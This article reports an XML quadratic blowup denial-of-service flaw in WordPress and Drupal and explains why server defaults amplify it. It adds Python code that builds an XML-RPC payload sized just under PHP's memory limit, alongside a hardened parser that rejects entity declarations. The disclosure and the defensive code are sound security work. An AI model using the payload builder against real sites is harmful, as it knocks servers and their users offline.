Nir Goldshlager, a security researcher on Salesforce.com's product security team, has disclosed an XML vulnerability affecting the popular website platforms WordPress and Drupal.
It relies on the well-known XML Quadratic Blowup Attack and, when executed, can take down an entire website or server almost instantly.
The XML vulnerability Goldshlager discovered affects WordPress versions 3.5 to 3.9 (the current version at the time of writing) and works against a default installation. It also affects Drupal versions 6.x to 7.x (the latest version), again on a default installation.
The good news is that both WordPress and Drupal have released patches for their applications. Users and web hosts simply need to upgrade to the latest version to protect against the vulnerability.
If exploited, the vulnerability renders a website or web server unusable: it drives CPU and RAM usage to 100%, makes the server unavailable, and, because every stuck request holds a database connection, amounts to a denial of service against the MySQL database as well.
How it works.
This vulnerability uses what is called an XML Quadratic Blowup Attack. It is a close relative of the Billion Laughs attack, in which a chain of nested entity definitions, each referencing the previous one many times, lets a very small XML document exhaust the memory of a machine within seconds.
The Quadratic Blowup Attack does without nesting: it defines a single large entity (tens of thousands of characters) and then references that one entity tens of thousands of times. Each reference is expanded in full, so the output grows as the product of the entity's length and the number of references.
With this shape, an XML document of a few hundred kilobytes expands to hundreds of megabytes or even gigabytes in memory. That is enough to bring down an entire website or web server.
The default memory allocation limit for PHP (the language WordPress and Drupal are written in) is 128MB per process. In theory, this means that a single XML bomb request can never consume more than 128MB: PHP aborts the request with a fatal error once the limit is hit. So far so good, right?
Here's the problem: Apache, the world's most popular web server, has its "MaxClients" setting at 256 by default, so it will happily run that many requests at once. Meanwhile, MySQL, the database WordPress and Drupal use, has its default "max_connections" set to 151.
Each of those concurrent requests can hold close to the full 128MB. Multiplying the per-request limit by the number of requests the database will serve at once (128MB × 151) gives 19328MB, which is more than all the memory most servers have.
To attack the server successfully, the attacker first needs to fingerprint the PHP memory limit in effect on the victim's server. If the expanded payload overshoots that limit, PHP kills the request with a fatal "allowed memory size exhausted" error, the memory is freed immediately, and that attempt fails.
A payload sized just under the limit, however, is accepted and expanded in full, and the injected payload comes back in the response. Enough of those requests in parallel, each pinning a worker, a database connection and close to 128MB, brings the system down.
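To make the mechanism concrete, here is an added example, written for this page and not code from the advisory, WordPress or Drupal. It builds a quadratic-blowup document in XML-RPC shape, sizes one to land just under PHP's default memory_limit the way the fingerprinting step above describes, measures the actual expansion with expat on a deliberately small instance, and then shows the defence of refusing any entity declaration before it can be expanded. The method name demo.echo, the 0.9 headroom factor and the one-byte-per-character memory model are assumptions made for the illustration.

```python
import math
import xml.parsers.expat

# PHP's default memory_limit, as quoted in the article. This is the only
# number that matters for sizing one request; MaxClients / max_connections
# only decide how many such requests can run at once.
PHP_MEMORY_LIMIT = 128 * 1024 * 1024


def build_quadratic_payload(entity_len: int, repeats: int) -> str:
    """Build a quadratic-blowup document in XML-RPC shape.

    One internal entity of entity_len characters, referenced repeats times,
    with no nesting (nesting would be billion laughs). The document is about
    entity_len + 3 * repeats bytes plus fixed overhead, but a parser that
    resolves entities produces entity_len * repeats characters of content.
    The method name demo.echo is a placeholder, not a real platform method.
    """
    entity = "A" * entity_len
    refs = "&a;" * repeats
    return (
        '<?xml version="1.0"?>'
        '<!DOCTYPE methodCall [<!ENTITY a "' + entity + '">]>'
        "<methodCall><methodName>demo.echo</methodName>"
        "<params><param><value>" + refs + "</value></param></params></methodCall>"
    )


def plan_payload(memory_limit: int = PHP_MEMORY_LIMIT, headroom: float = 0.9) -> dict:
    """Size a payload to land just under memory_limit (the fingerprinting step).

    Pick n with n * n <= headroom * memory_limit. If expansion crossed the
    limit, PHP would abort the request with a fatal error and release the
    memory at once; staying under it keeps the worker busy and the memory
    pinned. Assumes one byte per expanded character and ignores parser
    overhead, which is why headroom is conservative. Computed only, never parsed.
    """
    n = math.isqrt(int(memory_limit * headroom))
    doc = build_quadratic_payload(n, n)
    return {
        "entity_len": n,
        "repeats": n,
        "document_bytes": len(doc.encode()),
        "expanded_bytes": n * n,
    }


def _count_value_chars(parser, doc: str) -> int:
    """Parse doc and return the number of characters delivered for <value>."""
    state = {"in_value": False, "total": 0}

    def start(name, attrs):
        if name == "value":
            state["in_value"] = True

    def end(name):
        if name == "value":
            state["in_value"] = False

    def chars(data):
        if state["in_value"]:
            state["total"] += len(data)

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(doc, True)
    return state["total"]


def measure_expansion(doc: str) -> int:
    """Parse with entity expansion left on, as a vulnerable endpoint would.

    Returns the expanded length of <value>. Only run this on small inputs:
    the point is to see the ratio, not to exhaust your own memory.
    """
    return _count_value_chars(xml.parsers.expat.ParserCreate(), doc)


class EntityRejected(Exception):
    """Raised when a request carries a DTD or entity declaration."""


def has_dtd(doc: str) -> bool:
    """Cheap pre-parse check: an XML-RPC request never needs a DTD, so any
    DOCTYPE or ENTITY declaration is reason enough to refuse it outright."""
    lowered = doc.lower()
    return "<!doctype" in lowered or "<!entity" in lowered


def parse_hardened(doc: str) -> int:
    """Parse with a handler that refuses the first entity declaration.

    The declaration is rejected before any reference to it can be expanded,
    so the work done is bounded by the document's own size.
    """
    parser = xml.parsers.expat.ParserCreate()

    def entity_decl(name, is_parameter_entity, value, base,
                    system_id, public_id, notation_name):
        raise EntityRejected("entity declaration not allowed: " + name)

    parser.EntityDeclHandler = entity_decl
    return _count_value_chars(parser, doc)


if __name__ == "__main__":
    small = build_quadratic_payload(100, 100)
    print("document bytes:", len(small), "expanded chars:", measure_expansion(small))
    print("sized for default memory_limit:", plan_payload())
    print("pre-check flags it:", has_dtd(small))
    try:
        parse_hardened(small)
    except EntityRejected as e:
        print("hardened parser refused it:", e)
```

The small instance (a 100-character entity referenced 100 times) already expands a document of a few hundred bytes into 10,000 characters; the planned one stays under the 128MB limit at roughly 44KB on the wire. Refusing a DOCTYPE before parsing is the right fix for an XML-RPC endpoint, which never legitimately carries a DTD; to my understanding that is the shape of the WordPress and Drupal patches, but check the actual diffs rather than taking this as their code. Note that PHP's libxml_disable_entity_loader() would not have helped here: it only stops external entities from being fetched, and this entity is defined inline.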
WordPress and Drupal have both updated their software to protect against this vulnerability. The update procedure will vary based on your setup.